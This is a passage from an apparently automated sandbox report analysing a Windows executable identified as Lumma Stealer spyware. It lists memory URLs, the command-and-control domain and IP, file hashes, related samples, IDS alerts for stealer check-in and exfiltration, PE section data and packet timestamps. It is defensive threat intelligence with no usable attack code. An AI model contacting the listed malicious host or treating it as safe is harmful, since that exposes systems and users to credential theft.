                https://www.google.com/images/branding/product/ico/googleg_lodp.ico | IERiUft8Wi.exe (process memory) | false | - | high
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252. | IERiUft8Wi.exe (process memory) | false | - | high
                https://mindhandru.buzz/ | IERiUft8Wi.exe (process memory) | false | - | high
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | IERiUft8Wi.exe (process memory) | false | - | high
                http://crl.rootca1.amazontrust.com/rootca1.crl0 | IERiUft8Wi.exe (process memory) | false | - | high
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | IERiUft8Wi.exe (process memory) | false | - | high
                http://ocsp.rootca1.amazontrust.com0: | IERiUft8Wi.exe (process memory) | false | - | high
                https://mindhandru.buzz/pi | IERiUft8Wi.exe (process memory) | false | - | high
                https://www.ecosia.org/newtab/ | IERiUft8Wi.exe (process memory) | false | - | high
                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | IERiUft8Wi.exe (process memory) | false | - | high
                https://mindhandru.buzz:443/api | IERiUft8Wi.exe (process memory) | false | - | high
                https://mindhandru.buzz/te | IERiUft8Wi.exe (process memory) | false | Avira URL Cloud: malware | unknown
                https://ac.ecosia.org/autocomplete?q= | IERiUft8Wi.exe (process memory) | false | - | high
                https://mindhandru.buzz/_AP | IERiUft8Wi.exe (process memory) | false | Avira URL Cloud: malware | unknown
                https://mindhandru.buzz/apiz | IERiUft8Wi.exe (process memory) | false | Avira URL Cloud: malware | unknown
                http://crl.micro | IERiUft8Wi.exe (process memory) | false | - | high
                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | IERiUft8Wi.exe (process memory) | false | - | high
                http://x1.c.lencr.org/0 | IERiUft8Wi.exe (process memory) | false | - | high
                http://x1.i.lencr.org/0 | IERiUft8Wi.exe (process memory) | false | - | high
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | IERiUft8Wi.exe (process memory) | false | - | high
                http://crt.rootca1.amazontrust.com/rootca1.cer0? | IERiUft8Wi.exe (process memory) | false | - | high
                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u | IERiUft8Wi.exe (process memory) | false | - | high
                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e | IERiUft8Wi.exe (process memory) | false | - | high
                https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg | IERiUft8Wi.exe (process memory) | false | - | high
                https://support.mozilla.org/products/firefoxgro.all | IERiUft8Wi.exe (process memory) | false | - | high
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | IERiUft8Wi.exe (process memory) | false | - | high
                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta | IERiUft8Wi.exe (process memory) | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.11.101 | mindhandru.buzz | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581219
Start date and time: 2024-12-27 08:45:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: IERiUft8Wi.exe (renamed because original name is a hash value)
Original Sample Name: c317f66c3bb595d92533e3d0fe227366.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 172.202.163.200
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target IERiUft8Wi.exe, PID 788 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:46:28 | API Interceptor | 8x Sleep call for process: IERiUft8Wi.exe modified
Match: 104.21.11.101
Associated Sample Name / URL | Detection | Threat Name | Context
zi042476Iv.exe | malicious | LummaC |
C8FtVPhuxd.exe | malicious | LummaC |
0zBsv1tnt4.exe | malicious | LummaC |
cqHMm0ykDG.exe | malicious | LummaC |
b0ho5YYSdo.exe | malicious | LummaC |
ZX2M0AXZ56.exe | malicious | LummaC |
0Pm0sadcCP.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc |
TTsfmr1RWm.exe | malicious | LummaC |
COBYmpzi7q.exe | malicious | LummaC |
lBsKTx65QC.exe | malicious | LummaC |
Match: mindhandru.buzz
Associated Sample Name / URL | Detection | Threat Name | Context
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
zi042476Iv.exe | malicious | LummaC | 172.67.165.185
C8FtVPhuxd.exe | malicious | LummaC | 104.21.11.101
U7TAniYFeK.exe | malicious | LummaC | 172.67.165.185
0zBsv1tnt4.exe | malicious | LummaC | 104.21.11.101
cqHMm0ykDG.exe | malicious | LummaC | 104.21.11.101
ZBbOXn0a3R.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
P0SJULJxI0.exe | malicious | LummaC | 172.67.165.185
b0ho5YYSdo.exe | malicious | LummaC | 104.21.11.101
r06aMlvVyM.exe | malicious | LummaC | 172.67.165.185
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
zi042476Iv.exe | malicious | LummaC | 104.21.11.101
C8FtVPhuxd.exe | malicious | LummaC | 104.21.11.101
U7TAniYFeK.exe | malicious | LummaC | 172.67.165.185
aD7D9fkpII.exe | malicious | Vidar | 172.64.41.3
6wFwugeLNG.exe | malicious | LummaC | 172.67.135.139
9mauyKC3JW.exe | malicious | Unknown | 172.67.153.243
uUtgy7BbF1.exe | malicious | LummaC | 104.21.71.155
x4PaiRVIyM.exe | malicious | LummaC | 172.67.175.134
3vLKNycnrz.exe | malicious | LummaC | 104.21.62.151
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
zi042476Iv.exe | malicious | LummaC | 104.21.11.101
C8FtVPhuxd.exe | malicious | LummaC | 104.21.11.101
U7TAniYFeK.exe | malicious | LummaC | 104.21.11.101
8lOT1rXZp5.exe | malicious | RedLine | 104.21.11.101
6wFwugeLNG.exe | malicious | LummaC | 104.21.11.101
9mauyKC3JW.exe | malicious | Unknown | 104.21.11.101
uUtgy7BbF1.exe | malicious | LummaC | 104.21.11.101
x4PaiRVIyM.exe | malicious | LummaC | 104.21.11.101
3vLKNycnrz.exe | malicious | LummaC | 104.21.11.101
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.951387471271285
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: IERiUft8Wi.exe
File size: 1'884'672 bytes
MD5: c317f66c3bb595d92533e3d0fe227366
SHA1: ff7cf48fd32a6e4b73b14568c7610d585e5b40d3
SHA256: 77e2dd1562a40f41cea1d27cd0bf045c762372807813718327a6cae72c46731e
SHA512: 6415beacba6698451e4610799f99dacc4522f81e9dd60e65d076bc0910656cdc4e30115ff5242743f7d7bbbae851a0cc884a2da9e5cdea486011f748e7b9704a
SSDEEP: 49152:6PK+ZDavbc8mfhKVdteGkKnEzKgJTeQH:6PK+6bcVfhKSKnEzKgJTxH
TLSH: A2953311BCA0DA38C95DA1721E839F94FBB4886D0582DB119D4B73FF09336D7AD20D6A
                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................J...........@...........................J......O....@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x8ab000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007F0E3912185Ah
push fs
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F0E39123855h
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                pop es
                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                adc byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add al, 0Ah
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                adc byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add ecx, dword ptr [edx]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add dword ptr [eax+00000000h], eax
                                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(blank) | 0x1000 | 0x52000 | 0x26400 | 960690cb62460472232e39e277b45570 | False | 0.9995851205065359 | data | 7.981882961435573 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x53000 | 0x1ac | 0x200 | c4249243ceaeb236e3ce8ce2ab2c9a69 | False | 0.5390625 | data | 5.249019796122045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(blank) | 0x55000 | 0x2b2000 | 0x200 | 3558b9946726cb0fc4bba012755a73ef | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jvzofgxg | 0x307000 | 0x1a3000 | 0x1a2200 | baa33c52871efcc970a08cd471fc5740 | False | 0.9946556193946189 | data | 7.955291479684767 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jsezhyer | 0x4aa000 | 0x1000 | 0x400 | ee11bbbba25d0d93fbe83377fdbf0221 | False | 0.740234375 | data | 5.936339266781999 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4ab000 | 0x3000 | 0x2200 | 4c06587458ddd67b28551e2c9046332d | False | 0.10363051470588236 | DOS executable (COM) | 1.249588131658659 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x53058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T08:46:28.446417+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49699 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:29.286052+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49699 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:29.286052+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49699 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:30.508950+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:31.289089+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:31.289089+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:32.913749+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49702 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:34.055670+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49702 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:35.440185+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49708 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:37.713708+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49714 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:40.342640+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49720 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:43.828737+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49727 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:46.916525+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49741 | 104.21.11.101 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 08:46:27.151782990 CET | 49699 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:27.151832104 CET | 443 | 49699 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:27.152087927 CET | 49699 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:27.155390024 CET | 49699 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:27.155406952 CET | 443 | 49699 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:28.446269035 CET | 443 | 49699 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:28.446417093 CET | 49699 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:28.458045006 CET | 49699 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:28.458062887 CET | 443 | 49699 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:28.458420992 CET | 443 | 49699 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:28.500988960 CET | 49699 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:28.531136990 CET | 49699 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:28.531167030 CET | 49699 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:28.531280041 CET | 443 | 49699 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:29.286068916 CET | 443 | 49699 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:29.286166906 CET | 443 | 49699 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:29.286236048 CET | 49699 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:29.288254976 CET | 49699 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:29.288285971 CET | 443 | 49699 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:29.288578987 CET | 49699 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:29.288593054 CET | 443 | 49699 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:29.296612978 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:29.296674013 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:29.296861887 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:29.297141075 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:29.297164917 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:30.508742094 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:30.508949995 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:30.510412931 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:30.510428905 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:30.510724068 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:30.512104034 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:30.512175083 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:30.512195110 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.289088964 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.289144039 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.289167881 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.289194107 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.289283991 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.289334059 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.295248985 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.295322895 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.295346022 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.303550005 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.303582907 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.303618908 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.303648949 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.303699017 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.311871052 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.353887081 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.408592939 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.412636995 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.412700891 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.412723064 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.463206053 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.481040001 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.484735012 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.484769106 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.484824896 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.484859943 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.484882116 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.484911919 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.484944105 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.485183954 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.485205889 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.485225916 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.485234976 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.651917934 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.651962042 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:31.652034998 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.652856112 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:31.652872086 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:32.913616896 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:32.913748980 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:33.141607046 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:33.141628981 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:33.142024040 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:33.146990061 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:33.147176981 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:33.147198915 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:34.055761099 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:34.056061983 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:34.056137085 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:34.056252956 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:34.056279898 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:34.180793047 CET | 49708 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:34.180819035 CET | 443 | 49708 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:34.180947065 CET | 49708 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:34.181390047 CET | 49708 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:34.181402922 CET | 443 | 49708 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:35.439984083 CET | 443 | 49708 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:35.440185070 CET | 49708 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:35.450329065 CET | 49708 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:35.450345039 CET | 443 | 49708 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:35.450604916 CET | 443 | 49708 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:35.451984882 CET | 49708 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:35.452117920 CET | 49708 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:35.452142000 CET | 443 | 49708 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:35.452187061 CET | 49708 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:35.495326996 CET | 443 | 49708 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:36.255857944 CET | 443 | 49708 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:36.255953074 CET | 443 | 49708 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:36.256073952 CET | 49708 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:36.256402969 CET | 49708 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:36.256417990 CET | 443 | 49708 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:46:36.446023941 CET | 49714 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:46:36.446083069 CET | 443 | 49714 | 104.21.11.101 | 192.168.2.7
                                                                                                                Dec 27, 2024 08:46:36.446203947 CET49714443192.168.2.7104.21.11.101
